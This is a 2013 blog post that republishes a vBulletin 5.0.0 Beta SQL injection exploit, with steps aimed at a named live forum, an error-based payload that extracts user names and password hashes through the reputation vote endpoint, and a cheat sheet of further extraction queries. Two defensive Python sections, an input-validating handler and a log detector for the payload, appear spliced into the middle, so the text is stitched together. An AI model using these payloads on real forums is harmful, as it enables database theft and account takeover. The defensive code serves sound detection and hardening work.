Tuesday, 16 July 2013

vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day (Priv8)


This one is being sold on 1337 for $300 :)
http://www.priv8.1337day.com/exploit/description/20002
vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day
#Category: web application
#Type: SQL Injection
#Requirements: Firefox / Live HTTP Headers
#Dork: Powered by vBulletin™ Version 5.0.0 Beta (or) use your brain, you'll get more o_O

Step 1
Create an account on the vBulletin forum, verify the account and activate it.
For the demo we will use this forum:
Link = http://www.prospectrush.com/new_forum/
I have already made an account, so I will log in directly.

Step 2
Go to / open any topic and open Live HTTP Headers (https://addons.mozilla.org/en/firefox/addon/live-http-headers/) << download from here.
Then, on the topic page, look for the "Like" button and click on it.
The HTTP traffic will be captured by the Live HTTP Headers addon.
Step 3
Go to the first POST in Live HTTP Headers; it will look like this:
POST *Something /ajax/api/reputation/vote HTTP/1.1
Select it and click on the Replay button.
Step 4
Then go to Send POST Content and use the query below;
just add the query after "noteid=somenumber".
=======================
SQL Query
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
=======================
The above SQLi query will fetch the first record from the user table (username/password).
You will see the username and the password in encrypted form; get the salt too and decrypt it. I won't show the decrypting, use your brain :)
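The vote endpoint in the steps above takes its note id from the `noteid` POST field, and the injection works only because that field reaches the SQL text unchanged. As an added example (mine, not vBulletin's code and not the post author's), here is how such a handler should treat the field: parse the form body, accept only a plain positive integer, and hand it to the database as a bound parameter. The `note` table, the handler functions and both request bodies are constructed for the illustration, and `sqlite3` stands in for MySQL.

```python
"""Hardened handling of the ``noteid`` POST field for a reputation-vote style
endpoint. Added illustration, not vBulletin code: the table, the handler and
the sample request bodies are all constructed for this example."""
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed stand-in for a reputation table (sqlite3 instead of MySQL).
SCHEMA = """
CREATE TABLE note (noteid INTEGER PRIMARY KEY, votes INTEGER NOT NULL DEFAULT 0);
INSERT INTO note (noteid, votes) VALUES (101, 0), (102, 5);
"""

# A note id is a plain positive integer; anything else is rejected up front.
NOTEID_RE = re.compile(r"[1-9][0-9]{0,9}")

# Constructed request bodies: a legitimate vote and one carrying the
# error-based injection pattern from the post (shortened).
LEGIT_BODY = "noteid=101&vote=1"
INJECTED_BODY = (
    "noteid=101) and(select 1 from(select count(*),concat(version(),"
    "floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338"
)


class BadRequest(ValueError):
    """Validation failure; a web handler would answer HTTP 400."""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def parse_noteid(body):
    """Extract and validate ``noteid`` from a form-encoded POST body."""
    fields = parse_qs(body, keep_blank_values=True)
    values = fields.get("noteid", [])
    if len(values) != 1:
        raise BadRequest("noteid missing or repeated")
    raw = values[0]
    if not NOTEID_RE.fullmatch(raw):
        raise BadRequest("noteid must be a positive integer")
    return int(raw)


def vote(conn, body, delta=1):
    """Apply one vote. Returns the new count, or None if the note is unknown."""
    noteid = parse_noteid(body)
    # Bound parameters: the id travels as data, never spliced into the SQL
    # text, so even a value that slipped past validation could not alter
    # the statement's structure.
    cur = conn.execute(
        "UPDATE note SET votes = votes + ? WHERE noteid = ?", (delta, noteid)
    )
    if cur.rowcount == 0:
        return None
    row = conn.execute(
        "SELECT votes FROM note WHERE noteid = ?", (noteid,)
    ).fetchone()
    return row[0]


def try_vote(conn, body):
    """Wrapper returning ('ok', count), ('not_found', None) or ('rejected', why)."""
    try:
        count = vote(conn, body)
    except BadRequest as exc:
        return ("rejected", str(exc))
    return ("ok", count) if count is not None else ("not_found", None)


if __name__ == "__main__":
    db = make_db()
    print(try_vote(db, LEGIT_BODY))     # ('ok', 1)
    print(try_vote(db, "noteid=999"))   # ('not_found', None)
    print(try_vote(db, INJECTED_BODY))  # ('rejected', 'noteid must be a positive integer')
```

The two layers are deliberately independent: the integer check stops the injected body before any query is built, and the bound parameter would still keep the statement's structure intact if the check were ever bypassed or forgotten on a sibling endpoint.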

=============
Greets to Real Author, All Indian & Pakistani Brothers, 1337day, ashiyane forums & All Indian Hacking Groups
//Note: Those brothers who have my mail id can contact me for other deals
Offer Valid till 29th March 2013
Regards
./NoTty_rAJ
Thanks

[#Other SQLi Syntaxes]

*********************************************************************************************************************
|Version():
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

*********************************************************************************************************************
|User():
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

*********************************************************************************************************************
|Database():
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

*********************************************************************************************************************
|Database Print:
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

*********************************************************************************************************************
|Table Count:
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

*********************************************************************************************************************
|Print Tables:
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

*********************************************************************************************************************
|Columns of selected table:
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

*********************************************************************************************************************
|Fetch Out Data:
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
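Every query in the list above shares one fingerprint: `floor(rand(0)*2)` feeding a `group by` (the duplicate-key error trick), lookups in `information_schema`, the `0x7e`/`0x27` delimiters inside `concat()`, and the closing `AND (1338=1338` tautology. As an added example, not part of the original post, here is detection logic that URL-decodes and normalises request-log lines and flags that combination. The log line format, the three sample lines (the second carries a URL-encoded copy of the version() query above) and the two-indicator threshold are my assumptions for the illustration.

```python
"""Detection of the error-based SQL injection fingerprint shared by the
queries above, applied to constructed request-log lines. Added example, not
part of the original post; log format and thresholds are assumptions."""
import re
from urllib.parse import unquote_plus

# Signature name -> regex applied to the normalised request text.
SIGNATURES = {
    # floor(rand(0)*2) feeding a GROUP BY: the double-query trick that
    # provokes a duplicate-key error whose message carries the selected value.
    "rand_floor_groupby": re.compile(r"floor\(rand\(0?\)\*2\).*group by", re.S),
    "information_schema": re.compile(r"information_schema\."),
    "hex_delimiters": re.compile(r"concat\(0x7e,0x27|0x27,0x7e"),
    "numeric_tautology": re.compile(r"\b(\d+)=\1\b"),
    "close_paren_and": re.compile(r"\)and\("),
}

# Constructed log format: timestamp client method path body ('-' if no body).
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<body>\S+)$"
)


def normalise(raw):
    """Canonicalise request text: URL-decode twice (catches double encoding),
    drop inline SQL comments, lowercase, collapse whitespace and remove
    spaces around punctuation so spacing tricks do not defeat the regexes."""
    text = unquote_plus(unquote_plus(raw))
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    text = re.sub(r"\s+", " ", text).lower()
    text = re.sub(r" ?([()*,=]) ?", r"\1", text)
    return text


def classify(line):
    """Return a dict with hits and verdict, or None for an unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    text = normalise(m["path"] + " " + m["body"])
    hits = [name for name, rx in SIGNATURES.items() if rx.search(text)]
    # The rand/floor/group-by combination is decisive on its own; otherwise
    # ask for two weaker indicators to keep false positives down.
    verdict = "sqli" if "rand_floor_groupby" in hits or len(hits) >= 2 else "clean"
    return {"client": m["client"], "path": m["path"], "hits": hits, "verdict": verdict}


def scan(lines):
    """All flagged records from an iterable of log lines."""
    results = (classify(line) for line in lines)
    return [r for r in results if r is not None and r["verdict"] == "sqli"]


# Constructed sample log: a normal vote, the same endpoint hit with a
# URL-encoded version of the version() query above, and a benign search
# that merely mentions GROUP BY.
SAMPLE_LOG = [
    "2013-07-16T10:00:01Z 203.0.113.5 POST /ajax/api/reputation/vote "
    "noteid=4711&vote=1&securitytoken=abc",
    "2013-07-16T10:00:07Z 203.0.113.5 POST /ajax/api/reputation/vote "
    "noteid=4711%29+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+"
    "%28select+concat%280x7e%2C0x27%2Ccast%28version%28%29+as+char%29%2C0x27%2C0x7e%29%29+"
    "from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+"
    "from+information_schema.tables+group+by+x%29a%29+AND+%281338%3D1338&vote=1",
    "2013-07-16T10:01:00Z 198.51.100.7 GET /search.php?q=mysql+group+by+tutorial -",
]

if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec["client"], rec["path"], rec["hits"])
```

The normalisation step matters more than the regexes: the same query can arrive percent-encoded, with `/**/` in place of spaces, or in mixed case, and only the canonical form is worth matching. A signature set like this catches this one family; it is a cheap first filter for a WAF rule or a log pipeline, not a substitute for parameterised queries at the endpoint.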

Greetz to HeXagone & Raw-X
